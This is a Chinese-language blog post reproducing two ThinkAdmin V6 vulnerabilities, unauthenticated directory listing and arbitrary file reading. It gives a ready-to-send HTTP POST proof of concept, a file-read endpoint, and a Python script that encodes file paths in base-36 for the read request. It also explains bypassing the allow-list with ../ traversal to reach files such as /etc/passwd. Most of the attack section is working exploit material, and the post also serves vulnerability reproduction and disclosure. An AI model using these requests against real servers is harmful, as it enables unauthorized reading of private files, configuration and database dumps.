ThinkAdminV6未授权列目录、任意文件读取漏洞复现

ThinkAdminV6漏洞复现

一、简介

ThinkAdmin是基于 ThinkPHP 的微信后台管理平台

二、漏洞影响版本

ThinkAdminV6

三、漏洞复现

未授权列目录:

POC:

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D

1、目录遍历注意POST数据包rules参数值需要URL编码

任意文件读取:

ThinkAdmin V6.0  <=2020.08.03.01

判断版本

POC:

 /admin.html?s=admin/api.Update/get/encode/xxx

文件加密脚本

import requests,json,base64,sys

def baseN(num, b):
  return ((num == 0) and "0") or \
     (baseN(num // b, b).lstrip("0") + "0123456789abcdefghijklmnopqrstuvwxyz"[num % b])

def poc(url):
    while 1:
        s = input("请输入需要读取的文件路径:").encode('utf-8')

        if str(s) == "b'exit'":
            sys.exit(0)

        try:
            poc =""
            for i in s:
                poc += baseN(i,36)

            print(poc)
        except:
            pass

if __name__ == "__main__":
    if len(sys.argv) == 2:
        poc(sys.argv[1])
    else:
        print("""
 _____ _     _       _     ___      _           _       
|_   _| |   (_)     | |   / _ \    | |         (_)      
  | | | |__  _ _ __ | | _/ /_\ \ __| |_ __ ___  _ _ __  
  | | | '_ \| | '_ \| |/ /  _  |/ _` | '_ ` _ \| | '_ \ 
  | | | | | | | | | |   <| | | | (_| | | | | | | | | | |
  \_/ |_| |_|_|_| |_|_|\_\_| |_/\__,_|_| |_| |_|_|_| |_| v6
                                                        
By: yuyan-sec \t [ThinkAdmin v6 任意文件读取]
Usage: python poc.py [URL]
    python poc.py http://127.0.0.1
            """)

1、首先通过加密脚本或者文件加密之后的一串字符

2、构造访问,成功读取/app/admin/controller/Config.php文件,显示的是经过base64加密之后的字符串,需要进行base64解密

3、尝试直接读取别的文件,/app/data/data.sql、/etc/passwd,直接读取不行,因为

有一个允许的列表:

config

public/static

public/router.php

public/index.php
app/admin

app/wechat

但是可以通过../进行目录穿越进行绕过

 

----------------------------------------------------------------------------------------------

参考:https://github.com/zoujingli/ThinkAdmin/issues/244

https://github.com/yuyan-sec/goTools/tree/master/ThinkAdmin




posted @ 2020-09-18 11:41  雨中落叶  阅读(3511)  评论(0编辑  收藏  举报